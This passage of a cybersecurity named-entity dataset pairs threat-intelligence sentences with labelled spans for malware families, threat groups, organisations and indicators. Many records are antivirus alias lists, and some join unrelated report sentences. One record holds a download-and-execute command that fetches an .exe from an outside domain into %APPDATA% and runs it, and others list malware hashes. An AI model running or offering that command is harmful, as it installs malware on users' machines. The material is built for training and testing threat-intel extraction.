Win32.Trojan.Vbkrypt.Wtnm Backdoor.Win32.Hostposer W32/VB.ATID!tr.dldr Win32/Trojan.154", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001613", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.4487 MemScan:Trojan.Downloader.JKCH Trojan/W32.Katusha.28672 MemScan:Trojan.Downloader.JKCH Win32.Trojan.WisdomEyes.16070401.9500.9999 MemScan:Trojan.Downloader.JKCH MemScan:Trojan.Downloader.JKCH Trojan.Okuks.53 Packed.Katusha.bvl Trojan/Win32.Subsys Trojan.Downloader.JKCH MemScan:Trojan.Downloader.JKCH Trojan.SubSys", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001614", "source": "cyner2_valid"}} {"text": "Gh0st is very versatile as it allows an adversary to take complete control over the infected system including installing additional malware.", "spans": 
{"Malware: Gh0st": [[0, 5]], "System: infected system": [[84, 99]]}, "info": {"id": "cyner2_valid_001615", "source": "cyner2_valid"}} {"text": "For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically.", "spans": {"Organization: gaming companies": [[89, 105]]}, "info": {"id": "cyner2_valid_001616", "source": "cyner2_valid"}} {"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume .", "spans": {"System: Android": [[43, 50], [175, 182], [292, 299]], "Organization: eSurv": [[87, 92]]}, "info": {"id": "cyner2_valid_001618", "source": "cyner2_valid"}} {"text": "Apple's official iOS App Store is well known for its strict code review of any app submitted by a developer.", "spans": {"Organization: Apple's": [[0, 7]], "System: iOS App Store": [[17, 30]], "System: app": [[79, 82]], "Organization: developer.": [[98, 108]]}, "info": {"id": "cyner2_valid_001619", "source": "cyner2_valid"}} {"text": "mobile_treats_2013_06s It extorts money from users by threatening to block the smartphone : it displays a message demanding $ 500 to unblock the device .", "spans": {}, "info": {"id": "cyner2_valid_001621", "source": "cyner2_valid"}} {"text": "downloadfilehttps://cedacriall.faith/1aqalpiniahelfuimoksa.exe,%APPDATA%\\exe;start-process %APPDATA%\\exe", "spans": {}, "info": {"id": "cyner2_valid_001622", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Troj.Msil.Crypt!c Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Trojan.PTVM-0994 TR/Kazy.78720.8 Backdoor:MSIL/Noobsrat.A Trojan.Kazy.D129B7 Spyware/Win32.KeyLogger.R59663 Msil.Trojan.Crypt.Bxm Win32/Trojan.a72", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_001623", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Ubriel.r3 Backdoor.Win32.Ubriel.b Trojan.Win32.Ubriel.cqzbwu PE:Backdoor.Ubriel.b!1610691084 BackDoor.Ultimate.2 Backdoor.Ubriel.Win32.8 BehavesLike.Win32.Nofear.cm Backdoor/Ubriel.k Win32.Hack.Ubriel.b.kcloud Backdoor:Win32/Ubriel.C Trojan/Win32.HDC Bck/BeastDoor.AG Backdoor.Win32.Havar W32/Ubriel.B!tr.bdr BackDoor.Ubriel.B Backdoor.Win32.Ubriel.av", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001624", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9590 W32/Backdoor2.HUCB Infostealer.Rezbau TSPY_REZBAU.RF Trojan.Win32.U.RCS.314776 TrojWare.Win32.Arcyess.B Trojan.BugorCRTD.Win32.6822 TSPY_REZBAU.RF W32/Backdoor.QAFA-6625 Trojan/Htsrl.a Trojan.Strictor.DC9E2 Trojan:Win32/Arcyess.A!dha Backdoor/Win32.Rehai16.R158256 Win32/Trojan.221", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001625", "source": "cyner2_valid"}} {"text": "This particular attack has been active since 2014.", "spans": {}, "info": {"id": "cyner2_valid_001627", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Downloader.IP Trojan.Reconyc! 
Sinowal.FSR Trojan.Win32.Reconyc.bfwb Trojan.Win32.Reconyc.cwjeyy TrojWare.Win32.FakeAV.HH Trojan.DownLoader11.4260 Trojan/Win32.Reconyc Win32.Troj.Reconyc.bf.kcloud Trojan.Reconyc W32/Reconyc.BF!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001630", "source": "cyner2_valid"}} {"text": "This is the latest tool developed by attackers behind operation Shrouded Crossbow, which has produced other BIFROSE variants such as KIVARS and KIVARS x64.", "spans": {"Malware: tool": [[19, 23]], "Malware: BIFROSE variants": [[108, 124]], "Malware: KIVARS": [[133, 139]], "Malware: KIVARS x64.": [[144, 155]]}, "info": {"id": "cyner2_valid_001632", "source": "cyner2_valid"}} {"text": "An email with the subject of Invoice notification with id number: 40533 pretending to come from random senders with a link in the email to a malicious word doc delivers some sort of malware.", "spans": {"Malware: malware.": [[182, 190]]}, "info": {"id": "cyner2_valid_001634", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Winlire.a Trojan.Win32.Drop.vrisy Win32.Worm.Winlire.Suxc Win32.HLLW.Winelir Worm.Winlire.Win32.1 Worm.Win32.Winlire W32/Trojan.OUDU-5804 TR/Dorrew.A.1 Worm:Win32/Winlire.A Win32/Winlire.A Trojan.Dorrew!HW8v8TUW1cE Trj/CI.A Win32/Trojan.938", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001635", "source": "cyner2_valid"}} {"text": "Unlike other rooting malware, this Trojan not only installs its modules into the system, it also injects malicious code into the system runtime libraries.", "spans": {"Malware: rooting malware,": [[13, 29]], "Malware: Trojan": [[35, 41]], "System: system,": [[81, 88]], "System: the system runtime libraries.": [[125, 154]]}, "info": {"id": "cyner2_valid_001636", "source": "cyner2_valid"}} {"text": "Why Do Desktop Trojans Use a Mobile Component ? 
About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers .", "spans": {}, "info": {"id": "cyner2_valid_001638", "source": "cyner2_valid"}} {"text": "We expect it to churn out new variants with even more sophisticated techniques .", "spans": {}, "info": {"id": "cyner2_valid_001639", "source": "cyner2_valid"}} {"text": "Recently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.", "spans": {"Organization: FireEye": [[10, 17]], "Vulnerability: zero-day vulnerabilities": [[39, 63]], "System: Microsoft Office products": [[67, 92]], "Vulnerability: exploited": [[108, 117]]}, "info": {"id": "cyner2_valid_001640", "source": "cyner2_valid"}} {"text": "Malware clearly remains a desired cyber weapon of choice.", "spans": {"Malware: Malware": [[0, 7]]}, "info": {"id": "cyner2_valid_001641", "source": "cyner2_valid"}} {"text": "There are also many other modifications , fully described in our private report .", "spans": {}, "info": {"id": "cyner2_valid_001643", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.CD98 Backdoor/Rbot.aie Win32.Trojan.WisdomEyes.16070401.9500.9995 W32.Spybot.Worm Win.Trojan.Packed-85 Backdoor.Win32.Rbot.aie Backdoor.Win32.A.Rbot.126464.D Win32.HLLW.MyBot.11580 BehavesLike.Win32.Sdbot.cc Trojan.Win32.Agobot Packed.Morphine.a Backdoor.Win32.Rbot.aie Win32/Rbot.DVR W32/RBot.AIE!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001644", "source": "cyner2_valid"}} {"text": "In this attack, as we've seen with other versions of HDDCryptor, the ransomware dropped some tools to perform full disk encryption, as well as the encryption of mounted SMB drives.", "spans": {"Malware: HDDCryptor,": [[53, 64]], "Malware: ransomware": [[69, 79]]}, "info": {"id": "cyner2_valid_001645", "source": "cyner2_valid"}} {"text": "While the 
application is in the background , although the service is already running , the beaconing will not start .", "spans": {}, "info": {"id": "cyner2_valid_001646", "source": "cyner2_valid"}} {"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘ update ’ that may go unnoticed .", "spans": {"Malware: ViperRAT": [[0, 8]]}, "info": {"id": "cyner2_valid_001647", "source": "cyner2_valid"}} {"text": "Over the course of several weeks, Talos focused research on Sundown activity and our findings were surprising.", "spans": {"Organization: Talos": [[34, 39]], "Malware: Sundown": [[60, 67]]}, "info": {"id": "cyner2_valid_001648", "source": "cyner2_valid"}} {"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear .", "spans": {"Malware: FinFisher": [[5, 14]]}, "info": {"id": "cyner2_valid_001649", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Ransom.Locky.20 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Golroted Win.Trojan.Confuserex-6268058-0 Backdoor.Win32.Kirts Backdoor:MSIL/Splori.A Trj/GdSda.A Win32.Trojan.Falsesign.Lplj MSIL/Kryptik.HIU!tr Win32/Trojan.Ransom.d73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001650", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Exploit.SWF.AW Exploit.SWF.AW Exploit.PDF.SWF.B Exploit.SWF.AW SWF/Swif.A Trojan.Pidief TROJ_PIDIEF.JYS Exploit.SWF.CVE-2011-0611.z Exploit.Swf.Cve20110611.riuyt Exploit.SWF.AW Exploit.SWF.AW Exploit.PDF.2369 TROJ_PIDIEF.JYS BehavesLike.PDF.Evasion.dx SWF/Swif.A Exploit.CVE-2011-0611.k EXP/CVE-2011-0611.K SWF/CVE_2011_0611.Z!exploit Exploit.SWF.AW Exploit:SWF/ShellCode.B PDF/CVE-2010-1297.B!exploit Exploit.SWF.AW Win32.Exploit.Cve-2011-0611.Hupz Exploit.SWF.CVE-2011-0611 Exploit.SWF.AW Exploit_c.UDJ heur.swf.rateIII.66", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001651", "source": "cyner2_valid"}} {"text": "A 
backdoor also known as: Trojan.Mdropper TROJ_CVE201711882.SM1 Exploit.OleNative.CVE-2017-11882.evenbv TROJ_CVE201711882.SM1 Exploit:O97M/CVE-2017-11882.A Exploit.CVE-2017-11882 Win32/Trojan.Exploit.fa4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001652", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.ZomJoiner!O TrojanDropper.ZomJoiner Dropper.ZomJoiner.Win32.52 Trojan/Dropper.ZomJoiner.b Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Virus.EGNS-9078 Trojan.Dropper Win.Trojan.Aavirus-2 Trojan-Dropper.Win32.ZomJoiner.b Trojan.Win32.ZomJoiner.ejxy W32.W.Mabezat.l5Eq Trojan.MulDrop.18385 BehavesLike.Win32.Mydoom.zm Trojan-Dropper.Win32.ZomJoiner TrojanDropper.ZomJoiner.b Trojan[Dropper]/Win32.ZomJoiner Trojan.Win32.Z.Zomjoiner.9384 Trojan-Dropper.Win32.ZomJoiner.b TrojanDropper.ZomJoiner Trojan.DR.ZomJoiner!x9m8v+yJIQc W32/Zjoin.DN!tr Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001653", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanPSW.Zbot.C3 Trojan.Injector.Win32.369399 TROJ_KOVTER.SMFD Win.Packer.VbPack-0-6334882-0 Trojan.Win32.Dwn.ebdmck Trojan.DownLoader19.64784 TROJ_KOVTER.SMFD TR/Dropper.VB.52936 Trojan.Zusy.D2D84A Trojan.Injector!jIvQU/lMWaU Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001654", "source": "cyner2_valid"}} {"text": "During this time , “ Agent Smith ” hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers .", "spans": {"Malware: Agent Smith": [[21, 32]], "System: 9Apps": [[96, 101]]}, "info": {"id": "cyner2_valid_001655", "source": "cyner2_valid"}} {"text": "HawkEye is a commercially available crimeware tool provider that offers a variety of products that include a keylogger, malware encrypting tool and brute-forcing tool, all of which can be purchased online through their public website.", 
"spans": {"Malware: HawkEye": [[0, 7]], "Malware: keylogger, malware encrypting tool": [[109, 143]], "Malware: brute-forcing tool,": [[148, 167]]}, "info": {"id": "cyner2_valid_001656", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PowerShell/NukeSped.A BKDR_RATANKBA.ZAEL-A BKDR_RATANKBA.ZAEL-A Win32/Backdoor.efa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001658", "source": "cyner2_valid"}} {"text": "It has several protections in place , both in the C2 and the malware 's code .", "spans": {}, "info": {"id": "cyner2_valid_001659", "source": "cyner2_valid"}} {"text": "TYPE_VIEW_TEXT_CHANGED Represents the event of changing the text of an EditText .", "spans": {}, "info": {"id": "cyner2_valid_001660", "source": "cyner2_valid"}} {"text": "All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. .", "spans": {"Organization: Connexxa S.R.L .": [[105, 121]], "Vulnerability: EternalBlue": [[150, 161]], "Organization: government bodies": [[324, 341]], "Organization: military entities": [[344, 361]], "Organization: educational institutions": [[375, 399]]}, "info": {"id": "cyberner_stix_valid_000000", "source": "cyberner_stix_valid"}} {"text": "These SMS messages masquerade as a message from the local post office and link to the FakeSpy download . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group . 
In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": {"Malware: FakeSpy": [[86, 93]], "Organization: Kaspersky Lab": [[242, 255]], "Organization: financial institutions": [[289, 311]]}, "info": {"id": "cyberner_stix_valid_000001", "source": "cyberner_stix_valid"}} {"text": "In the native library , it stores the strings to access the SMS API . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . ShareShell Share a shell to other . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"Vulnerability: CVE-2014-0515": [[159, 172]], "Vulnerability: Adobe Flash exploit": [[173, 192]], "Organization: Cisco TRAC": [[211, 221]]}, "info": {"id": "cyberner_stix_valid_000002", "source": "cyberner_stix_valid"}} {"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh Londhe , Dileep . We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file .", "spans": {"Organization: Yogesh Londhe": [[67, 80]], "Organization: Dileep": [[83, 89]], "Indicator: regsvr32.exe": [[162, 174]], "Indicator: SCT file": [[237, 245]]}, "info": {"id": "cyberner_stix_valid_000003", "source": "cyberner_stix_valid"}} {"text": "New FakeSpy applications masquerading as post office apps . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . 
APT38 has paralleled North Korea 's worsening financial condition .", "spans": {"Malware: FakeSpy": [[4, 11]], "Organization: financial": [[238, 247]], "Organization: energy": [[250, 256]], "Organization: government": [[263, 273]]}, "info": {"id": "cyberner_stix_valid_000004", "source": "cyberner_stix_valid"}} {"text": "Extract the address book . Lua modules is a technique that has previously been used by Flamer . During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason . The frameworks evolving realworld tactics , techniques and procedures can help organizations better understand how to allocate resources properly to detect ransomware early enough to prevent a successful attack .", "spans": {"System: address book": [[12, 24]], "Malware: backdoor": [[169, 177]], "Malware: Pierogi": [[187, 194]], "Organization: Cybereason": [[198, 208]]}, "info": {"id": "cyberner_stix_valid_000005", "source": "cyberner_stix_valid"}} {"text": "The fields it collects are : Mobile - The phone number which sent the SMS Content - The message body Sender - The contact name who sent the message Time - The time the message was received onReceive function used to intercept incoming SMS messages . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": {"Organization: FireEye": [[510, 517]]}, "info": {"id": "cyberner_stix_valid_000006", "source": "cyberner_stix_valid"}} {"text": "No instances of these apps were found in Google Play . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . 
Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"System: Google Play": [[41, 52]], "Organization: financial sector": [[116, 132]], "Organization: Chronicle": [[281, 290]], "Malware: Winnti": [[372, 378]]}, "info": {"id": "cyberner_stix_valid_000007", "source": "cyberner_stix_valid"}} {"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000008", "source": "cyberner_stix_valid"}} {"text": "] 132:28855 GoldenCup : New Cyber Threat Targeting World Cup Fans As the World Cup launches , so does a new threat Officials from the Israeli Defense Force recently uncovered an Android Spyware campaign targeting Israeli soldiers and orchestrated by \" Hamas . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS . krab5.dll : 0f270db9ab9361e20058b8c6129bf30e d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 , Mon Oct 29 17:39:23 2018 UTC . krab5.text : 019bc7edf8c2896754fdbdbc2ddae4ec . krab5.rdata : d6ed79624f7af19ba90f51379b7f31e4 . krab5.data : 1ec7b57b01d0c46b628a991555fc90f0 . krab5.rsrc : 89b7e19270b2a5563c301b84b28e423f . krab5.reloc : 685c3c775f65bffceccc1598ff7c2e59 . 
passing this wide string to function with only one string This could lead to unexpected behavior it could raise access violation exception or just continue and only the first placeholder replaced .", "spans": {"Malware: GoldenCup": [[12, 21]], "Organization: Israeli Defense Force": [[134, 155]], "System: Android": [[178, 185]], "Organization: Hamas": [[252, 257]], "Organization: Google": [[406, 412]], "Indicator: krab5.dll": [[433, 442]], "Indicator: 0f270db9ab9361e20058b8c6129bf30e": [[445, 477]], "Indicator: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525": [[478, 542]], "Indicator: krab5.text": [[576, 586]], "Indicator: 019bc7edf8c2896754fdbdbc2ddae4ec": [[589, 621]], "Indicator: krab5.rdata": [[624, 635]], "Indicator: d6ed79624f7af19ba90f51379b7f31e4": [[638, 670]], "Indicator: krab5.data": [[673, 683]], "Indicator: 1ec7b57b01d0c46b628a991555fc90f0": [[686, 718]], "Indicator: krab5.rsrc": [[721, 731]], "Indicator: 89b7e19270b2a5563c301b84b28e423f": [[734, 766]], "Indicator: krab5.reloc": [[769, 780]], "Indicator: 685c3c775f65bffceccc1598ff7c2e59": [[783, 815]]}, "info": {"id": "cyberner_stix_valid_000009", "source": "cyberner_stix_valid"}} {"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications . Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer . Before the malware can be installed a unique name must to be generated for the service . 
But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": {"Organization: Lookout": [[30, 37]], "Malware: ViperRAT": [[132, 140]], "Organization: Bradshaw": [[543, 551]], "Organization: Avid Life": [[597, 606]], "Organization: AshleyMadisonSucks.com": [[622, 644]]}, "info": {"id": "cyberner_stix_valid_000010", "source": "cyberner_stix_valid"}} {"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher ’ s malicious behavior throughout the attack kill chain and alert SecOps personnel . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions . nbtscan.exe", "spans": {"System: Windows Defender Advanced Threat Protection": [[90, 133]], "Malware: FinFisher": [[141, 150]]}, "info": {"id": "cyberner_stix_valid_000011", "source": "cyberner_stix_valid"}} {"text": "Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . 
In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"Malware: PYTHON33.dll": [[45, 57]], "Malware: inicore_v2.3.30.dll": [[70, 89]], "Organization: CTU": [[286, 289]], "Indicator: s.txt": [[326, 331]]}, "info": {"id": "cyberner_stix_valid_000012", "source": "cyberner_stix_valid"}} {"text": "X-Agent is a signature tool of Fancy Bear operations—a cross-platform backdoor toolset with variants for Windows , MacOS , Android , and iOS .", "spans": {"Malware: X-Agent": [[0, 7]], "System: Windows": [[105, 112]], "System: MacOS": [[115, 120]], "System: Android": [[123, 130]], "System: iOS": [[137, 140]]}, "info": {"id": "cyberner_stix_valid_000013", "source": "cyberner_stix_valid"}} {"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": {"Vulnerability: CVE-2014-0515": [[89, 102]], "Vulnerability: Adobe Flash exploit": [[103, 122]], "Organization: Cisco TRAC": [[141, 151]]}, "info": {"id": "cyberner_stix_valid_000014", "source": "cyberner_stix_valid"}} {"text": "Palo Alto Networks customers are protected from this threat by :", "spans": {"Organization: Palo Alto Networks": [[0, 18]]}, "info": {"id": "cyberner_stix_valid_000015", "source": "cyberner_stix_valid"}} {"text": "This bootkit is not the first of this kind . After that , the attacker is capable to control the compromised device . APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside . 
As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": {"Organization: Java": [[470, 474]]}, "info": {"id": "cyberner_stix_valid_000016", "source": "cyberner_stix_valid"}} {"text": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer ’s approval .", "spans": {"Organization: CNIIHM": [[42, 48], [115, 121]]}, "info": {"id": "cyberner_stix_valid_000017", "source": "cyberner_stix_valid"}} {"text": "They don’t have any arguments , and they are quite self-explanatory .", "spans": {}, "info": {"id": "cyberner_stix_valid_000018", "source": "cyberner_stix_valid"}} {"text": "In recent years , the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000019", "source": "cyberner_stix_valid"}} {"text": "Once a certificate has been compromised , so has the reputation of the organization who signed it .", "spans": {}, "info": {"id": "cyberner_stix_valid_000020", "source": "cyberner_stix_valid"}} {"text": "This time the email was made to look like an investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to the MEA officials .", "spans": {"Organization: Ministry of Home Affairs": [[119, 143]], "Organization: Indian embassy": [[253, 267]], "Organization: MEA": [[275, 278]]}, "info": {"id": "cyberner_stix_valid_000021", "source": "cyberner_stix_valid"}} {"text": "LUNAR SPIDER had already introduced BokBot to the criminal market at the time Neverquest operations ceased , suggesting that the malware change may 
have been planned . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"Vulnerability: zero-day": [[284, 292]], "Vulnerability: exploit": [[293, 300]]}, "info": {"id": "cyberner_stix_valid_000022", "source": "cyberner_stix_valid"}} {"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": {"Organization: financial services": [[81, 99]], "Organization: telecoms": [[102, 110]], "Organization: government": [[113, 123]], "Organization: defense sectors": [[130, 145]], "Malware: GozNym": [[188, 194]], "Malware: Trojan": [[220, 226]], "Organization: Kessem": [[336, 342]]}, "info": {"id": "cyberner_stix_valid_000023", "source": "cyberner_stix_valid"}} {"text": "This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . Japan is no stranger to banking malware .", "spans": {"Malware: malicious Word documents": [[159, 183]], "Indicator: banking": [[272, 279]], "Indicator: malware": [[280, 287]]}, "info": {"id": "cyberner_stix_valid_000024", "source": "cyberner_stix_valid"}} {"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . 
But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": {"Malware: Winnti": [[175, 181]], "Malware: BARIUM": [[188, 194]], "Malware: LEAD": [[199, 203]]}, "info": {"id": "cyberner_stix_valid_000025", "source": "cyberner_stix_valid"}} {"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device . The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", "spans": {"Malware: RGDoor backdoor": [[357, 372]], "Organization: government organizations": [[421, 445]], "Organization: financial": [[463, 472]], "Organization: educational institution": [[481, 504]]}, "info": {"id": "cyberner_stix_valid_000026", "source": "cyberner_stix_valid"}} {"text": "address book substituted into the message text 40 “ text ” : string Shutting down applications with specific names ( antivirus and banking applications ) The set of possible commands is the most significant difference between the various flavors of Asacub . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C . 
The first , CVE-2022 - 41123 , has been revealed by ZDI to be DLL hijacking3 due to the loading of a non - existent component by a privileged executed command .", "spans": {"System: address book": [[0, 12]], "Malware: Asacub": [[249, 255]], "Organization: CTU": [[258, 261]], "Organization: Kaspersky": [[331, 340]], "Vulnerability: CVE-2022 - 41123": [[553, 569]], "Vulnerability: DLL hijacking3": [[603, 617]]}, "info": {"id": "cyberner_stix_valid_000027", "source": "cyberner_stix_valid"}} {"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"Malware: EventBot": [[47, 55]], "Malware: malicious sample": [[98, 114]], "Organization: CTU": [[262, 265]], "Organization: social engineering": [[387, 405]]}, "info": {"id": "cyberner_stix_valid_000028", "source": "cyberner_stix_valid"}} {"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"Indicator: Devoted To Humanity": [[243, 262]]}, "info": {"id": "cyberner_stix_valid_000029", "source": "cyberner_stix_valid"}} {"text": "Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": {}, "info": {"id": "cyberner_stix_valid_000030", "source": "cyberner_stix_valid"}} {"text": "Ke3chang attackers have used spear-phishing emails . 
This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan .", "spans": {"Indicator: Panda Banker": [[99, 111]], "Organization: financial institutions": [[147, 169]]}, "info": {"id": "cyberner_stix_valid_000031", "source": "cyberner_stix_valid"}} {"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": {}, "info": {"id": "cyberner_stix_valid_000032", "source": "cyberner_stix_valid"}} {"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": {"Vulnerability: CVE-2016-4117": [[68, 81]], "Organization: telecommunications companies": [[257, 285]]}, "info": {"id": "cyberner_stix_valid_000033", "source": "cyberner_stix_valid"}} {"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": {"Organization: electronics": [[94, 105]], "Vulnerability: Flash Player exploit": [[132, 152]]}, "info": {"id": "cyberner_stix_valid_000034", "source": "cyberner_stix_valid"}} {"text": "The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007 . 
